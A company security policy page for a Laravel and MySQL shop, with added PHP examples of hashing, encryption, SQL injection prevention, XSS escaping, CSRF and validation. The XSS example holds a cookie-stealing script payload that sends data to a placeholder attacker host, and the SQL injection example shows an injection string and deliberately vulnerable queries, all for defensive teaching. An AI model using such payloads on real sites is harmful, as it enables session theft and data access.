Security policy

Anti-virus & Anti-malware

Workstations and servers at Tezcan IT Solutions BV are scanned regularly for viruses and malware, always using the most recent signature databases.

Sensitive information

Customer data is stored on production servers and is only accessible to employees of Tezcan IT Solutions BV who are authorized to do so. Backups are stored on a restricted server, only accessible from certain IP ranges.

Where necessary (or in accordance with the client's wishes) sensitive data is stored with encryption.

Customers can submit a request for the removal of their data. Sensitive hard copy data will be shredded.


Data access

Only employees of Tezcan IT Solutions BV who work on a product have access to it. When their contract is terminated, they lose their access.


Technologies used

Various technologies are used, but most projects are built on Laravel and MySQL. Security updates to these are applied as part of the SLA where the SLA covers them; where it does not, they can always be applied on request at an hourly rate.

Hosting provider

Tezcan IT Solutions BV uses two server suppliers:

Strato: hosts the VarenykyCMS system. Strato's data centres are ISO 27001 certified and located in Germany.

Transip: hosts all other services. Transip's data centres are ISO 27001, NEN 7510 and ISO 9001 certified and located in the Netherlands.

Secure connection: HTTPS

Tezcan IT Solutions BV uses TLS certificates (still commonly called SSL certificates) so that traffic between the user's browser and the server is encrypted and the server's identity can be verified. On request and at a surcharge, a certificate with extended validation (EV) can be used. Note that current browsers no longer show the green address bar that once distinguished EV certificates; the difference now lies only in the stricter identity checks the certificate authority performs before issuing.

SSH access: Private keys

Access to production environments is by SSH key-based authentication only; passwords are not used for SSH logins. A key is issued only to employees who need access to that environment.

Password Hashing: Bcrypt with a unique salt

All user passwords are hashed one-way with bcrypt, which generates a unique random salt for every password and has a configurable work factor. A hash cannot be reversed to recover the password; an attacker who obtains the database can only try candidate passwords one by one, and the work factor makes every attempt expensive. Passwords are never stored as plain text.
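
The following is an added example, not code from this page or from Tezcan IT Solutions BV. It shows the behaviour described above through Laravel's Hash facade (bcrypt by default); it assumes a Laravel application with an App\Models\User model that has a `password` column, and the `verifyAndUpgrade` function is a hypothetical helper written for this illustration.

```php
<?php
// Added example (not Tezcan IT Solutions BV's code): bcrypt hashing through
// Laravel's Hash facade. Run inside a Laravel app, e.g. with `php artisan tinker`.
// App\Models\User with a `password` column is assumed.

use App\Models\User;
use Illuminate\Support\Facades\Hash;

$password = 'correct horse battery staple'; // constructed sample password

// bcrypt draws a fresh 128-bit random salt for every call and stores it inside
// the 60-character hash, so hashing the same password twice gives two
// different strings. No salt column is needed in the database.
$first  = Hash::make($password);
$second = Hash::make($password);
var_dump($first === $second);               // bool(false)
var_dump(str_starts_with($first, '$2y$'));  // bool(true): PHP's bcrypt identifier

// Verification re-runs bcrypt with the salt and cost read from the stored hash
// and compares the result in constant time. Nothing is ever "decrypted".
var_dump(Hash::check($password, $first));   // bool(true)
var_dump(Hash::check('guess', $first));     // bool(false)

// The cost ("rounds" in config/hashing.php) is what makes offline guessing slow.
// When it is raised, old hashes keep verifying but should be replaced at the next
// successful login, the only moment the plaintext is available to the server.
function verifyAndUpgrade(User $user, string $plaintext): bool
{
    if (! Hash::check($plaintext, $user->password)) {
        return false;
    }
    if (Hash::needsRehash($user->password)) {
        $user->forceFill(['password' => Hash::make($plaintext)])->save();
    }
    return true;
}
```

One caveat worth building into the validation rules: bcrypt only processes the first 72 bytes of the input, so a password rule with a maximum length of 72 bytes avoids silently accepting passphrases whose tail is never checked.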


Encryption of Sensitive Data: AES-256-CBC

Where necessary (or in accordance with the client's wishes) sensitive data is stored encrypted with AES-256 in CBC mode. In Laravel this is the framework's encrypter, which also attaches an HMAC-SHA256 to every ciphertext so that data that has been modified is rejected on decryption instead of being decrypted to garbage. The encryption key is generated on the production server and kept in a configuration file there (in Laravel, APP_KEY in the .env file); it is never committed to git version control.
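
The following is an added example, not code from this page or from Tezcan IT Solutions BV. It encrypts a field with Laravel's Crypt facade, which implements the AES-256-CBC-with-HMAC scheme described above, and then shows what happens when the ciphertext is tampered with. It assumes a Laravel application whose APP_KEY is set; the IBAN is a constructed sample value.

```php
<?php
// Added example (not Tezcan IT Solutions BV's code): field encryption with
// Laravel's Crypt facade. Run inside a Laravel app whose APP_KEY is set.

use Illuminate\Contracts\Encryption\DecryptException;
use Illuminate\Support\Facades\Crypt;

$plaintext  = 'NL91ABNA0417164300';          // constructed sample: an IBAN
$ciphertext = Crypt::encryptString($plaintext);

// The token is base64 of a JSON document carrying a random IV, the AES-256-CBC
// ciphertext and an HMAC-SHA256 over both (newer versions add an empty "tag"
// field, used only by GCM ciphers).
$payload = json_decode(base64_decode($ciphertext), true);
print_r(array_keys($payload));               // iv, value, mac[, tag]

var_dump(Crypt::decryptString($ciphertext) === $plaintext); // bool(true)

// CBC on its own would decrypt a modified ciphertext to garbage without noticing;
// the MAC turns that into a hard failure. Flip one bit of the ciphertext:
$raw    = base64_decode($payload['value']);
$raw[0] = chr(ord($raw[0]) ^ 0x01);
$payload['value'] = base64_encode($raw);

try {
    Crypt::decryptString(base64_encode(json_encode($payload)));
} catch (DecryptException $e) {
    echo $e->getMessage(), PHP_EOL;          // The MAC is invalid.
}

// On an Eloquent model the same scheme is applied transparently through a cast:
// the column holds the token above, the attribute reads back as plaintext.
//   protected $casts = ['iban' => 'encrypted'];
```

Because the key lives only in the server-side configuration file, anyone who can read that file can decrypt every stored value; file permissions on the production host and the IP-restricted backup server are therefore as much part of this control as the cipher itself.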


SQL injection

To prevent SQL injection, an ORM (Object-Relational Mapping; Laravel's Eloquent, together with the query builder) is used. Values are sent to MySQL as bound parameters rather than spliced into the SQL text, so malicious input cannot change the structure of a query. This holds as long as the raw query methods are not handed unbound user input.
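
The following is an added example, not code from this page or from Tezcan IT Solutions BV. It puts string-built SQL beside the parameterised forms that Laravel's query builder and Eloquent use, and covers the two places where the protection does not apply automatically. It assumes a `users` table with an `email` column and an App\Models\User model; `sortedUsers` is a hypothetical helper written for this illustration.

```php
<?php
// Added example (not Tezcan IT Solutions BV's code): string-built SQL beside
// parameterised queries in Laravel. A `users` table with an `email` column and
// an App\Models\User model are assumed.

use App\Models\User;
use Illuminate\Support\Collection;
use Illuminate\Support\Facades\DB;

$email = "x' OR '1'='1"; // constructed attacker input

// VULNERABLE: the input is spliced into the SQL text, the quote closes the
// string literal and the OR clause matches every row:
//   SELECT * FROM users WHERE email = 'x' OR '1'='1'
$rows = DB::select("SELECT * FROM users WHERE email = '$email'");

// SAFE: the SQL text is fixed and the value travels as a bound parameter, so it
// is compared literally (no user has the e-mail "x' OR '1'='1") and nothing matches.
$rows = DB::select('SELECT * FROM users WHERE email = ?', [$email]);

// SAFE: the query builder and Eloquent bind every value automatically.
$user = User::where('email', $email)->first();   // null

// STILL VULNERABLE: the *Raw methods accept SQL fragments verbatim ...
$rows = DB::table('users')->whereRaw("email = '$email'")->get();
// ... so give them bindings too.
$rows = DB::table('users')->whereRaw('email = ?', [$email])->get();

// Identifiers (table and column names) cannot be bound at all. Map user input
// onto an allow-list instead of passing it to orderBy() or select() directly.
function sortedUsers(string $requestedColumn): Collection
{
    $allowed = ['name', 'email', 'created_at'];
    if (! in_array($requestedColumn, $allowed, true)) {
        throw new InvalidArgumentException("Unsupported sort column: $requestedColumn");
    }
    return User::orderBy($requestedColumn)->get();
}
```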


XSS protection

To combat XSS attacks, a templating engine (Blade) is employed which escapes output automatically: every value printed with the standard {{ }} syntax is HTML-encoded, so user-supplied text is displayed rather than interpreted as markup or script. Unescaped output has to be requested explicitly and is reserved for HTML the application generated itself.
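
The following is an added example, not code from this page or from Tezcan IT Solutions BV. It renders the same attacker-controlled value through Blade's escaped and unescaped syntaxes, using Blade::render() (available since Laravel 9) so the output can be inspected directly; the `$comment` string is constructed attacker input and the attacker.example host is a placeholder.

```php
<?php
// Added example (not Tezcan IT Solutions BV's code): Blade's escaping rules,
// rendered inline with Blade::render(). $comment is constructed attacker input.

use Illuminate\Support\Facades\Blade;

$comment = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// {{ }} passes the value through e(), i.e. htmlspecialchars() with ENT_QUOTES and
// UTF-8, so the browser displays the text instead of executing it.
echo Blade::render('<p>{{ $comment }}</p>', ['comment' => $comment]);
// <p>&lt;script&gt;fetch(&quot;https://attacker.example/?c=&quot; + document.cookie)&lt;/script&gt;</p>

// {!! !!} emits the value verbatim. It exists for HTML the application built
// itself; never use it on user-controlled data.
echo Blade::render('<p>{!! $comment !!}</p>', ['comment' => $comment]);
// <p><script>fetch(...)</script></p>   <- runs in every visitor's browser

// The same helper works outside templates (e-mail bodies, API error messages):
echo e($comment);

// Entity escaping is right for element text and quoted attributes. Inside a
// <script> block it produces HTML entities, not a JavaScript literal, so hand
// data to scripts as JSON instead: @json also hex-encodes < > & ' " so that a
// "</script>" inside the value cannot close the block.
echo Blade::render('<script>const comment = @json($comment);</script>', ['comment' => $comment]);
// <script>const comment = "\u003Cscript\u003Efetch(\u0022https:\/\/attacker.example\/?c=\u0022 ...";</script>
```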


CSRF token protection

A CSRF token is generated automatically for every user session. Every POST, PUT, PATCH and DELETE request must carry that token and is rejected (HTTP 419) if it does not match the session. Because a page on another website can make the browser submit a form to the application but cannot read the token, it cannot forge a state-changing request. GET requests are not checked, so they must never change data.


Authentication

Laravel's built-in authentication is used; it is configured in line with the policy on this page (bcrypt password hashing, session-based logins and CSRF protection). Route middleware restricts routes to authenticated users and, via gates and policies, to users with a particular role or permission level.
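
The following is an added example, not code from this page or from Tezcan IT Solutions BV. It is a routes/web.php fragment that ties the CSRF token protection and the authentication sections above together: a form carrying the session token, the state-changing route that the token protects, and a route restricted to a user level. ProfileController, AdminUserController, the `admin` gate and a `users.is_admin` column are assumed names for this illustration.

```php
<?php
// Added example (not Tezcan IT Solutions BV's code): routes/web.php fragment
// showing CSRF protection and authentication/authorization middleware together.
// ProfileController, AdminUserController, the `admin` gate and users.is_admin
// are assumed.

use App\Http\Controllers\AdminUserController;
use App\Http\Controllers\ProfileController;
use Illuminate\Support\Facades\Blade;
use Illuminate\Support\Facades\Route;

// The `auth` middleware sends guests to the login page; everything below
// therefore runs with a session and a logged-in user.
Route::middleware('auth')->group(function () {

    // GET only renders the form. VerifyCsrfToken checks POST, PUT, PATCH and
    // DELETE, not GET, so a GET route must never change state.
    Route::get('/profile', function () {
        return Blade::render(<<<'BLADE'
            <form method="POST" action="/profile">
                @csrf            {{-- hidden _token field: the session's CSRF token --}}
                @method('PUT')
                <input name="name" value="{{ auth()->user()->name }}">
                <button>Save</button>
            </form>
            BLADE);
    });

    // A PUT whose _token field (or X-CSRF-TOKEN header) does not match the
    // session is rejected with HTTP 419 before the controller runs. A page on
    // another origin can make the browser submit this form, but cannot read
    // the token to include it.
    Route::put('/profile', [ProfileController::class, 'update']);

    // Authorization on top of authentication: the `can` middleware runs the
    // `admin` gate and returns 403 unless it passes.
    Route::get('/admin/users', [AdminUserController::class, 'index'])
        ->middleware('can:admin');
});

// The gate itself, defined once in App\Providers\AppServiceProvider::boot():
//   Gate::define('admin', fn (User $user) => (bool) $user->is_admin);
```

Endpoints called by third-party systems (payment or e-mail webhooks) never carry a session token, so they have to be excluded from the check explicitly (the `$except` property of App\Http\Middleware\VerifyCsrfToken, or `validateCsrfTokens(except: [...])` in bootstrap/app.php on Laravel 11) and authenticated by their own signature instead. Regenerating the session at login (`$request->session()->regenerate()`) also issues a fresh token.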


Validation

Laravel's validation layer is applied to incoming input. It can, for example, restrict uploaded files to particular types (determined from the file's content rather than its name) and sizes, and check whether an e-mail address is already in use before creating an account.
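
The following is an added example, not code from this page or from Tezcan IT Solutions BV. It is a controller action implementing the two checks named above (file type and e-mail uniqueness) as a practitioner would write them, including the edge case of a user re-submitting their own existing address. The ProfileController name, the `users` table with `email`, `password` and `avatar_path` columns, and an `avatars` storage directory are assumed for this illustration.

```php
<?php
// Added example (not Tezcan IT Solutions BV's code): validation of a profile
// update. ProfileController, users.email/password/avatar_path and the
// `avatars` storage directory are assumed.

namespace App\Http\Controllers;

use Illuminate\Http\RedirectResponse;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Hash;
use Illuminate\Validation\Rule;
use Illuminate\Validation\Rules\Password;

class ProfileController extends Controller
{
    public function update(Request $request): RedirectResponse
    {
        $user = $request->user();

        // validate() returns only the fields listed here; anything else in the
        // request body is dropped and a failure redirects back with errors.
        $data = $request->validate([
            // `email` rejects malformed addresses; `unique` runs a bound query
            // against users.email, ignoring the caller's own row so that an
            // unchanged address is not reported as "already in use".
            'email' => [
                'required', 'email', 'max:254',
                Rule::unique('users', 'email')->ignore($user->id),
            ],

            // `mimes` sniffs the uploaded file's content to determine its type,
            // so "shell.php" renamed to "shell.png" is rejected; the browser's
            // file name and Content-Type header are not trusted. `max` is in KB.
            'avatar' => ['nullable', 'file', 'mimes:jpg,jpeg,png', 'max:2048'],

            // Optional password change: must be confirmed, at least 12 characters,
            // and (uncompromised) absent from known breach lists; that last check
            // calls the Have I Been Pwned range API over the network.
            'password' => ['nullable', 'confirmed', 'max:72', Password::min(12)->uncompromised()],
        ]);

        $user->email = $data['email'];

        if ($request->hasFile('avatar')) {
            // store() writes the file under a random generated name, so the
            // client cannot choose the path or extension that ends up on disk.
            $user->avatar_path = $request->file('avatar')->store('avatars');
        }

        if (! empty($data['password'])) {
            $user->password = Hash::make($data['password']);
        }

        $user->save();

        return back()->with('status', 'profile-updated');
    }
}
```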


GIT version control and backups

The application source is kept in a git repository. The repository contains no sensitive information: database passwords and encryption keys live in the server-side configuration file, which is excluded from version control.